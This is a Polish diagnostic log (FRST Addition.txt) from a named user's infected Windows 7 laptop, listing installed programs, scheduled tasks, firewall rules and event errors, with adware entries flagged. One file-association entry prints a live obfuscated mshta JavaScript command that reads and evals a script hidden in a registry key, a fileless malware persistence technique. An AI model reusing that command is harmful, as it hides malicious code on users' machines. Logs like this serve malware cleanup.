Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja: 06-11-2016 Uruchomiony przez Kamil Kozak (08-11-2016 18:48:56) Uruchomiony z C:\Users\Kamil Kozak\Desktop\MAZI Microsoft Windows 7 Professional Service Pack 1 (X86) (2011-04-04 05:42:37) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-1250789083-1527708771-4203453902-500 - Administrator - Disabled) Gość (S-1-5-21-1250789083-1527708771-4203453902-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1250789083-1527708771-4203453902-1004 - Limited - Enabled) Kamil Kozak (S-1-5-21-1250789083-1527708771-4203453902-1002 - Administrator - Enabled) => C:\Users\Kamil Kozak ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: ESET Smart Security 4.2 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1} AV: Microsoft Security Essentials (Disabled - Up to date) {71A27EC9-3DA6-45FC-60A7-004F623C6189} AS: ESET Smart Security 4.2 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C} AS: Microsoft Security Essentials (Disabled - Up to date) {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} FW: Zapora osobista (Enabled) {4FE52EC8-CB26-1113-0EFE-8842E2773BAA} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKU\S-1-5-21-1250789083-1527708771-4203453902-1002\...\uTorrent) (Version: 3.4.3.40760 - BitTorrent Inc.) Adobe Flash Player 22 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 22.0.0.210 - Adobe Systems Incorporated) Browser-Security (HKLM\...\Browser-Security) (Version: 1.2.0.0 - Vondos Media GmbH) <==== UWAGA CCleaner (HKLM\...\CCleaner) (Version: 5.16 - Piriform) Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.205.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710F4C1C-CC18-4C49-8CBF-51240C89A1A2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837B34E3-7C30-493C-8F6A-2B0F04E2912C}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.30319 (HKLM\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Mozilla Firefox 49.0.2 (x86 pl) (HKLM\...\Mozilla Firefox 49.0.2 (x86 pl)) (Version: 49.0.2 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 49.0.2 - Mozilla) Nokia Software Updater (HKLM\...\{7130468A-F53F-4698-8C09-A339EA3B05E6}) (Version: 3.0.655 - Nokia Corporation) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{010833F3-751A-402F-9FCC-C365B6A12E41}\localserver32 -> C:\Users\Kamil Kozak\Desktop\gry, instalki, programy\BESTplayer.exe (Karol Winnicki) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{1FD1FE74-9E3C-4C1C-AEEB-AAB592AD770F}\localserver32 -> C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{5E71E4F3-E8C7-4906-9626-973E418762B6}\InprocServer32 -> C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\1.2.205.0\goopdate.dll (Facebook Inc.) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{693566bc-21f8-401e-8d42-e2c5ce50dacc}\localserver32 -> C:\Users\KAMILK~1\AppData\Local\Temp\{d5641912-e47a-429c-879e-cfe13eac7a13}\IDriver.NonElevated.exe (dane wartości zawierają 13 znaków więcej). CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{8B9F5BF4-0407-4BB2-9FED-4C0372DABD00}\localserver32 -> C:\Users\Kamil Kozak\AppData\Local\Facebook\Video\Skype\FacebookVideoCallingProxy.exe (Skype Limited) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{B6CE1A28-A831-43E4-A81F-E2B429D66231}\InprocServer32 -> C:\Users\Kamil Kozak\AppData\Local\AskToolbar\Downloaded Program Files\Nero.dll (Ask.com) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{CBE9C57E-FFA9-4123-8354-AD360D6DD3CC}\InprocServer32 -> C:\Users\Kamil Kozak\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited) CustomCLSID: HKU\S-1-5-21-1250789083-1527708771-4203453902-1002_Classes\CLSID\{FBEB8A05-BEEE-4442-804E-409D6C4515E9}\InprocServer32 -> C:\windows\system32\shell32.dll (Microsoft Corporation) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {18AEC372-6A65-4598-8867-2BA4BB00B1CD} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Health Analysis => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2010-03-24] (Hewlett-Packard) Task: {1D3FA21B-C33A-43CB-A538-92FFB0012F10} - System32\Tasks\Adobe Flash Player Updater => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-11-06] (Adobe Systems Incorporated) Task: {2714CC34-FB09-463D-8255-1123EA8A9C24} - System32\Tasks\Registration => C:\Program Files\Hewlett-Packard\HP Setup\RemEngine.exe [2010-04-22] () Task: {4494F998-B246-453E-A56C-F39377ED5913} - System32\Tasks\APSnotifierPP2 => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== UWAGA Task: {65C0576C-D694-46D4-8FBF-8F73806BCEB2} - System32\Tasks\Scheduled Update for Ask Toolbar => C:\Program Files\Ask.com\UpdateTask.exe [2010-05-21] () <==== UWAGA Task: {72BB7F0C-D09A-45DB-9259-B77C48CDB7C9} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1250789083-1527708771-4203453902-1002Core => C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-06-22] (Facebook Inc.) Task: {74B1B1BC-897B-4EF0-97AB-9154F970CA49} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Tuneup => C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe [2010-03-24] (Hewlett-Packard) Task: {9190A08C-556C-4638-AC1C-EC4589DFD7B0} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-03-11] (Piriform Ltd) Task: {A040E7C4-501E-4006-937A-A669A7DCCD1C} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-08-30] (Microsoft Corporation) Task: {C8555432-1BCD-4DA9-9EB9-1B8C82ED0863} - System32\Tasks\APSnotifierPP3 => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== UWAGA Task: {CEF03235-A70B-4096-AB34-35962ED3BE50} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1250789083-1527708771-4203453902-1002UA => C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe [2014-06-22] (Facebook Inc.) Task: {F7E8DAE7-EB8D-496C-97DE-CD310DA7F682} - System32\Tasks\APSnotifierPP1 => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== UWAGA (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\windows\Tasks\APSnotifierPP1.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== UWAGA Task: C:\windows\Tasks\APSnotifierPP2.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== UWAGA Task: C:\windows\Tasks\APSnotifierPP3.job => C:\Program Files\AnyProtectEx\AnyProtect.exe <==== UWAGA Task: C:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1250789083-1527708771-4203453902-1002Core.job => C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe Task: C:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1250789083-1527708771-4203453902-1002UA.job => C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) Shortcut: C:\Users\Kamil Kozak\AppData\Local\739c\04fe.lnk -> C:\Users\Kamil Kozak\AppData\Local\739c\8407.bat () ==================== Załadowane moduły (filtrowane) ============== 2016-10-14 17:29 - 2016-10-14 17:29 - 03362304 ____N () C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll 2009-12-29 22:31 - 2009-12-29 22:31 - 00132384 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btkeyind.dll 2010-04-05 19:15 - 2010-04-05 19:15 - 00052280 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HardwareAccess.dll 2010-04-05 19:15 - 2010-04-05 19:15 - 00267832 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\HPCommon.XmlSerializers.dll 2010-04-05 19:15 - 2010-04-05 19:15 - 00055352 _____ () C:\Program Files\Hewlett-Packard\HP Power Assistant\Graphs.dll 2010-02-22 19:19 - 2010-02-22 19:19 - 02121728 _____ () C:\Program Files\Common Files\LightScribe\QtCore4.dll 2010-02-22 19:19 - 2010-02-22 19:19 - 07745536 _____ () C:\Program Files\Common Files\LightScribe\QtGui4.dll 2010-02-22 19:19 - 2010-02-22 19:19 - 00135168 _____ () C:\Program Files\Common Files\LightScribe\plugins\imageformats\qjpeg4.dll 2012-06-26 12:11 - 2012-06-26 12:11 - 02302040 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\QtCore4.dll 2012-06-26 12:11 - 2012-06-26 12:11 - 08197208 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\QtGui4.dll 2012-06-26 12:11 - 2012-06-26 12:11 - 00345688 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\QtXml4.dll 2012-06-26 12:10 - 2012-06-26 12:10 - 00202328 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\imageformats\qjpeg4.dll 2012-06-26 12:10 - 2012-06-26 12:10 - 00027736 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\imageformats\qsvg4.dll 2012-06-26 12:11 - 2012-06-26 12:11 - 00282200 _____ () C:\Program Files\Nokia\Nokia PC Suite 7\QtSvg4.dll 2016-03-11 21:31 - 2016-03-11 21:31 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1045.dll 2016-10-31 10:47 - 2016-10-31 10:47 - 47520256 _____ () C:\Users\Kamil Kozak\AppData\Roaming\BrowserMe\ChromeUpdate.exe 2010-04-05 19:11 - 2010-04-05 19:11 - 00030264 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_LogicLayer.dll 2010-04-05 19:12 - 2010-04-05 19:12 - 00052280 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HardwareAccess.dll 2010-04-05 19:12 - 2010-04-05 19:12 - 00267832 _____ () C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPCommon.XmlSerializers.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) HKU\S-1-5-21-1250789083-1527708771-4203453902-1002\Software\Classes\4a09: "C:\windows\system32\mshta.exe" "javascript:Ct3i7Ga="fJdS";wn09=new ActiveXObject("WScript.Shell");hyMxp4WA="FJ";S4Qld1=wn09.RegRead("HKCU\\software\\gxveifoagx\\yvszgh");dBB6Qn="xHV";eval(S4Qld1);iozB5JE="mbtVPiH";" <===== UWAGA ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:04 - 2009-06-10 22:39 - 00000824 ____N C:\windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-1250789083-1527708771-4203453902-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Kamil Kozak\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.100.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja wyłączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\startupreg: Facebook Update => "C:\Users\Kamil Kozak\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver MSCONFIG\startupreg: PC Suite Tray => "C:\Program Files\Nokia\Nokia PC Suite 7\PCSuite.exe" -onlytray MSCONFIG\startupreg: Skype => "C:\Program Files\Skype\Phone\Skype.exe" /minimized /regrun MSCONFIG\startupreg: Start WingMan Profiler => C:\Program Files\Logitech\Gaming Software\LWEMon.exe /noui ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe FirewallRules: [{8A980217-7891-48F1-8863-CFC82BD7463E}] => (Allow) C:\Program Files\Skype\Phone\Skype.exe FirewallRules: [{52F453DA-CD94-41F7-9847-77E1524E0EAE}] => (Allow) C:\Windows\System32\spool\drivers\w32x86\3\HP1006MC.EXE FirewallRules: [{C5F0D925-4284-4E1C-B719-45B2DC86F0CE}] => (Allow) C:\Windows\System32\spool\drivers\w32x86\3\HP1006MC.EXE FirewallRules: [{20E9DD5D-00D9-4AA0-80B4-189134979CE7}] => (Allow) C:\Windows\System32\msiexec.exe FirewallRules: [{1824C5DF-5840-426D-8E42-15E70AD8547D}] => (Allow) C:\Windows\System32\msiexec.exe FirewallRules: [{43195E2C-00FD-4667-841F-749ADEC4B7BF}] => (Allow) C:\Users\Kamil Kozak\AppData\Local\Facebook\Video\Skype\FacebookVideoCalling.exe FirewallRules: [{9A920761-A97E-4C45-8C69-049E857152B9}] => (Allow) C:\Program Files\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe FirewallRules: [{F1F3DF24-A700-4EC4-A2F0-2EF95AC223FD}] => (Allow) C:\Users\Kamil Kozak\AppData\Roaming\ACEStream\engine\ace_engine.exe FirewallRules: [{26928365-2C77-4466-9B20-90D9B546F867}] => (Allow) C:\Users\Kamil Kozak\AppData\Roaming\ACEStream\engine\ace_engine.exe FirewallRules: [{94421EAC-F45F-4D16-A089-C867B0015A2E}] => (Allow) C:\windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe FirewallRules: [{7547DB6B-5C1E-4753-8DE4-4963EC7E5499}] => (Allow) C:\Users\Kamil Kozak\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{074A2ABC-49BD-4FFB-AEFD-9D0F4F7AD653}] => (Allow) C:\Users\Kamil Kozak\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{0BC118A5-998A-42C5-B1EC-75584AEB47E6}] => (Allow) C:\windows\explorer.exe FirewallRules: [{B0E47B5D-0FE3-4961-A5F0-5373DC63336C}] => (Allow) C:\windows\system32\rundll32.exe FirewallRules: [{C2F2F69F-E2A7-4F51-B592-9ED1EE47D23A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{4E0A8A9D-8D91-4000-A18D-08591CA70984}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe ==================== Punkty Przywracania systemu ========================= 03-11-2016 00:40:38 Windows Update 03-11-2016 12:23:57 Windows Update 03-11-2016 15:40:49 Windows Update 04-11-2016 01:05:32 Windows Update 04-11-2016 11:45:08 Windows Update 04-11-2016 17:44:28 Windows Update 04-11-2016 23:23:17 Windows Update 06-11-2016 00:57:09 Windows Update 06-11-2016 13:32:49 Windows Update 06-11-2016 22:58:09 Windows Update 07-11-2016 00:19:03 Windows Update 07-11-2016 12:37:02 Windows Update 08-11-2016 00:57:56 Windows Update 08-11-2016 11:22:38 Windows Update 08-11-2016 17:18:16 Windows Update ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (11/08/2016 05:38:20 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe_protecthost.dll, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23543, sygnatura czasowa: 0x57d2f908 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0005297c Identyfikator procesu powodującego błąd: 0x101c Godzina uruchomienia aplikacji powodującej błąd: 0x01d239ddb5fa4ba2 Ścieżka aplikacji powodującej błąd: C:\Windows\System32\rundll32.exe Ścieżka modułu powodującego błąd: C:\windows\SYSTEM32\ntdll.dll Identyfikator raportu: c170279c-a5d1-11e6-86e1-643150868987 Error: (11/08/2016 03:19:22 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: iexplore.exe, wersja: 11.0.9600.18500, sygnatura czasowa: 0x57edec53 Nazwa modułu powodującego błąd: MSHTML.dll, wersja: 11.0.9600.18500, sygnatura czasowa: 0x57edfc0f Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00a75221 Identyfikator procesu powodującego błąd: 0x1ca4 Godzina uruchomienia aplikacji powodującej błąd: 0x01d239c9bca70fc2 Ścieżka aplikacji powodującej błąd: C:\Program Files\Internet Explorer\iexplore.exe Ścieżka modułu powodującego błąd: C:\windows\system32\MSHTML.dll Identyfikator raportu: 57571f2d-a5be-11e6-872e-643150868987 Error: (11/08/2016 01:59:18 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe_protecthost.dll, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23543, sygnatura czasowa: 0x57d2f908 Kod wyjątku: 0xc0000374 Przesunięcie błędu: 0x000c3b03 Identyfikator procesu powodującego błąd: 0xf60 Godzina uruchomienia aplikacji powodującej błąd: 0x01d239bfd34fdce9 Ścieżka aplikacji powodującej błąd: C:\Windows\System32\rundll32.exe Ścieżka modułu powodującego błąd: C:\windows\SYSTEM32\ntdll.dll Identyfikator raportu: 28361458-a5b3-11e6-872e-643150868987 Error: (11/08/2016 11:18:02 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: plugin-container.exe, wersja: 49.0.2.6136, sygnatura czasowa: 0x5807c043 Nazwa modułu powodującego błąd: mozglue.dll, wersja: 49.0.2.6136, sygnatura czasowa: 0x5807b9a7 Kod wyjątku: 0x80000003 Przesunięcie błędu: 0x0000e83e Identyfikator procesu powodującego błąd: 0xfe8 Godzina uruchomienia aplikacji powodującej błąd: 0x01d239a55352f944 Ścieżka aplikacji powodującej błąd: C:\Program Files\Mozilla Firefox\plugin-container.exe Ścieżka modułu powodującego błąd: C:\Program Files\Mozilla Firefox\mozglue.dll Identyfikator raportu: a0ef9c8b-a59c-11e6-b75f-643150868987 Error: (11/08/2016 10:58:33 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe_protecthost.dll, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23543, sygnatura czasowa: 0x57d2f908 Kod wyjątku: 0xc0000374 Przesunięcie błędu: 0x000c3b03 Identyfikator procesu powodującego błąd: 0x1358 Godzina uruchomienia aplikacji powodującej błąd: 0x01d239a4c33a42e7 Ścieżka aplikacji powodującej błąd: C:\Windows\System32\rundll32.exe Ścieżka modułu powodującego błąd: C:\windows\SYSTEM32\ntdll.dll Identyfikator raportu: e8128fab-a599-11e6-b75f-643150868987 Error: (11/07/2016 10:24:32 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: Program firefox.exe w wersji 49.0.2.6136 zatrzymał interakcję z systemem Windows i został zamknięty. Aby zobaczyć, czy jest dostępnych więcej informacji dotyczących tego problemu, sprawdź historię problemu w panelu sterowania Centrum akcji. Identyfikator procesu: 23bc Godzina rozpoczęcia: 01d23935c40d4932 Godzina zakończenia: 0 Ścieżka aplikacji: C:\Program Files\Mozilla Firefox\firefox.exe Identyfikator raportu: 46b7844a-a530-11e6-b410-643150868987 Error: (11/07/2016 04:13:28 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe_protecthost.dll, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23543, sygnatura czasowa: 0x57d2f908 Kod wyjątku: 0xc0000374 Przesunięcie błędu: 0x000c3b03 Identyfikator procesu powodującego błąd: 0x1454 Godzina uruchomienia aplikacji powodującej błąd: 0x01d239094c220778 Ścieżka aplikacji powodującej błąd: C:\Windows\System32\rundll32.exe Ścieżka modułu powodującego błąd: C:\windows\SYSTEM32\ntdll.dll Identyfikator raportu: bbe5dc61-a4fc-11e6-b410-643150868987 Error: (11/07/2016 11:19:21 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe_protecthost.dll, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23543, sygnatura czasowa: 0x57d2f908 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0005291f Identyfikator procesu powodującego błąd: 0x840 Godzina uruchomienia aplikacji powodującej błąd: 0x01d238defc402b22 Ścieżka aplikacji powodującej błąd: C:\Windows\System32\rundll32.exe Ścieżka modułu powodującego błąd: C:\windows\SYSTEM32\ntdll.dll Identyfikator raportu: a59cbb68-a4d3-11e6-b774-643150868987 Error: (11/07/2016 10:52:19 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe_protecthost.dll, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23543, sygnatura czasowa: 0x57d2f908 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0005291f Identyfikator procesu powodującego błąd: 0xfb0 Godzina uruchomienia aplikacji powodującej błąd: 0x01d238dbba808874 Ścieżka aplikacji powodującej błąd: C:\Windows\System32\rundll32.exe Ścieżka modułu powodującego błąd: C:\windows\SYSTEM32\ntdll.dll Identyfikator raportu: debf9d86-a4cf-11e6-905e-643150868987 Error: (11/06/2016 11:16:09 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: rundll32.exe_protecthost.dll, wersja: 6.1.7600.16385, sygnatura czasowa: 0x4a5bc637 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.1.7601.23543, sygnatura czasowa: 0x57d2f908 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0005291f Identyfikator procesu powodującego błąd: 0xe6c Godzina uruchomienia aplikacji powodującej błąd: 0x01d2387a9d508b26 Ścieżka aplikacji powodującej błąd: C:\Windows\System32\rundll32.exe Ścieżka modułu powodującego błąd: C:\windows\SYSTEM32\ntdll.dll Identyfikator raportu: 9ddba17c-a46e-11e6-a4b0-643150868987 Dziennik System: ============= Error: (11/08/2016 05:37:51 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (11/08/2016 05:37:51 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (11/08/2016 05:37:45 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (11/08/2016 05:37:45 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (11/08/2016 05:37:40 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (11/08/2016 05:37:39 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. Error: (11/08/2016 05:19:10 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: ZARZĄDZANIE NT) Description: Instalacja nie powiodła się: system Windows nie mógł zainstalować następującej aktualizacji, ponieważ wystąpił błąd 0x80070643: Aktualizacja zabezpieczeń pakietu redystrybucyjnego programu Microsoft Visual C++ 2008 z dodatkiem Service Pack 1 (KB2538243). Error: (11/08/2016 04:09:16 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na odpowiedź transakcji z usługi wlidsvc. Error: (11/08/2016 11:24:13 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: ZARZĄDZANIE NT) Description: Instalacja nie powiodła się: system Windows nie mógł zainstalować następującej aktualizacji, ponieważ wystąpił błąd 0x80070643: Aktualizacja zabezpieczeń pakietu redystrybucyjnego programu Microsoft Visual C++ 2008 z dodatkiem Service Pack 1 (KB2538243). Error: (11/08/2016 10:57:28 AM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT) Description: Odebrano następujący alert krytyczny: 40. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i5 CPU M 450 @ 2.40GHz Procent pamięci w użyciu: 73% Całkowita pamięć fizyczna: 1903.43 MB Dostępna pamięć fizyczna: 512.75 MB Całkowita pamięć wirtualna: 3806.86 MB Dostępna pamięć wirtualna: 1850.91 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:280.79 GB) (Free:183.81 GB) NTFS ==>[system z komponentami startowymi (pozyskano odczytując dysk)] Drive f: (HP_TOOLS) (Fixed) (Total:1.99 GB) (Free:0.26 GB) FAT32 ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 378C2B7F) Partition 1: (Active) - (Size=300 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=280.8 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=15 GB) - (Type=07 NTFS) Partition 4: (Not Active) - (Size=2 GB) - (Type=0C) ==================== Koniec Addition.txt ============================